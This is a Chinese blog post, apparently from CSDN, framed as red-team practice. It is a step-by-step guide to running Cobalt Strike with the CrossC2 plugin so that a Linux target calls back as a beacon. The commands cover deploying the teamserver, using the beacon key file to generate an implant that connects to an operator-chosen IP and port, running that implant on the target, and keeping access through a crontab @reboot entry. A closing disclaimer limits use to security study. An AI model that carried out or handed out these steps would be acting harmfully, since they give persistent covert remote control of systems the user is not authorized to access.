在红蓝对抗中,我们常需要对目标进行长时间的控制,cobaltstrike
原生对于上线windows
比较轻松友好,但如果是Linux
平台就需要用到第三方插件了。
准备工作
这里使用CrossC2
的插件,类似于在linux上反弹一个cobaltstrike类的shell。
github:https://github.com/gloxec/CrossC2
下载时注意自己的cs版本(我这里使用的是3.0.2的最新版插件,cs版本为4.3)
需要下载以下两个文件:
CrossC2***.cna
、genCrossC2.Linux
由于我的木马是在linux平台生成的,因此使用genCrossC2.Linux,可根据自己平台的差异自行选择
服务端部署
cobaltstrike服务端部署
chmod +x teamserver
./teamserver [ip] [password]
客户端连接
建立一个监听器,需要注意的是crossc2
插件只支持https
的beacon
安装crossc2
生成木马
我这里是在服务端的cobaltstrike目录直接生成的,如果在非服务端生成需要将服务端根目录的隐藏文件
.cobaltstrike.beacon_keys
复制下来放到cs根目录
chmod +x genCrossC2.Linux
./genCrossC2.Linux [ip] [port] ./.cobaltstrike.beacon_keys null Linux x64 /tmp/test
上线
在目标靶机上直接运行就可以看到上线了.
chmod +x test
./test
权限维持
一个简单的思想就是将其添加的系统启动项
有很多种方法,这里讲个最简单的,通过计划任务的方式实现
crontab -e
@reboot /tmp/test
这样每次重启之后都能重新执行
这里需要注意的是要设置以下次登录的用户的crontab
版权声明
本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35664104/article/details/121267679
免责声明
郑重声明:本号所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途,否则后果自行承担!
如有侵权,请联系删除
好文推荐